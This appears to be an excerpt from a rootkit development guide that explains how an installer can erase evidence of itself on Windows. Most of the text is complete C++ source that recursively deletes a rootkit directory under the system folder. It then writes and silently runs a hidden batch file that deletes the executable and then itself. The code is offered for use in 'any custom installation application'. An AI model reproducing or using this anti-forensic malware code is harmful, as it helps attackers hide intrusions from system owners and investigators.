Removing the Traces of an Installation

The Windows operating system does not provide a mechanism that allows a process to destroy its own image. This is because the image is protected while the process is running. Fortunately, this is not a limitation when using batch files, so an application that dynamically creates a batch file can erase all evidence of installation, provided the batch file is written to delete both its creator and itself.

The following example can be added to any custom installation application:

  #include <windows.h> #include <string> #include <vector> #include <direct.h> #include <malloc.h> #include <shellapi.h> using namespace std; typedef struct _DIRECTORY_STRUCT {  string path;  bool isdir;  vector<_DIRECTORY_STRUCT> subDirectories;  _DIRECTORY_STRUCT(const string& path, bool isdir = false):path(path), isdir(isdir){} } DIRECTORY_STRUCT; // Called by removeDirectory void fillDirStruct( DIRECTORY_STRUCT& root ) {  WIN32_FIND_DATA data;  memset( &data, 0, sizeof(data) );  HANDLE handle = FindFirstFile( root.path.c_str(), &data );  if(handle != ( HANDLE)NULL )   FindClose( handle );  root.isdir = ((data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) != 0);  if(!root.isdir)   return;  string path = root.path;  path.append("\\*");  handle = FindFirstFile( path.c_str(), &data );      // skip "."  FindNextFile( handle, &data );                            // skip ".."  memset( &data, 0, sizeof(data) );  while( FindNextFile( handle, &data ) == TRUE )  {   path = root.path;   path.append( "\\" ).append( data.cFileName );   root.subDirectories.push_back( DIRECTORY_STRUCT( path ) );   memset( &data, 0, sizeof(data) );  };  FindClose(handle); } // Called by removeDirectory void removeFile( const char * filename ) {  if( !filename )   return ;  SetFileAttributes( filename, FILE_ATTRIBUTE_NORMAL );  DeleteFile( filename );  return ; } // Recursive function to delete a directory and all subdirectories void removeDirectory( string& path ) {  if( path.empty() )   return;  DIRECTORY_STRUCT dirStruct( path.c_str() );  fillDirStruct( dirStruct );  if( dirStruct.isdir )  {   for( unsigned int j = 0; j < dirStruct.subDirectories.size(); j ++ )   {    string dpath = dirStruct.subDirectories[j].path;    removeDirectory( dpath );   }   ::rmdir( path.c_str() );  }  else  {  removeFile( path.c_str() );  }  return; } static const char batchFileName[] = "uninstallRootkit.bat"; void SelfDestruct() {  // temporary batch file  static char batchFile[] =   ":Repeat\r\n"   "del \"%s\"\r\n"   "if exist \"%s\" goto Repeat\r\n"   "rmdir \"%s\"\r\n"   "del \"%s\"";  char modulename[MAX_PATH];  char temppath[MAX_PATH];  char folder[MAX_PATH];  GetTempPath( MAX_PATH, temppath );  strcat( temppath, batchFileName );  GetModuleFileName( NULL, modulename, MAX_PATH );  strcpy ( folder, modulename );  char *pb = strrchr( folder, '\\' );  if (pb != NULL)   *pb = 0;  HANDLE hf;  hf = CreateFile( temppath, GENERIC_WRITE, 0, NULL,   CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL );  if (hf != INVALID_HANDLE_VALUE)  {   DWORD len;   char *bat;   bat = (char*)alloca( strlen( batchFile ) +    strlen( modulename ) * 2 + strlen( temppath ) + 20 );   wsprintf( bat, batchFile, modulename, modulename, folder, temppath );   WriteFile( hf, bat, strlen( bat ), &len, NULL );   CloseHandle( hf );   ShellExecute( NULL, "open", temppath, NULL, NULL, SW_HIDE );  } } // Removes %system32%\MyRootkit, then removes itself int main(int argc, char* argv[]) {  char systemDirectory[ MAX_PATH + 1 ];  if( !GetSystemDirectory( systemDirectory, MAX_PATH + 1 ) )   return 1;  // Delete the install directory  string directoryToDelete;  directoryToDelete = systemDirectory;  directoryToDelete += "\\MyRootkit";  removeDirectory( directoryToDelete );  // Delete this program  SelfDestruct();  return 0; }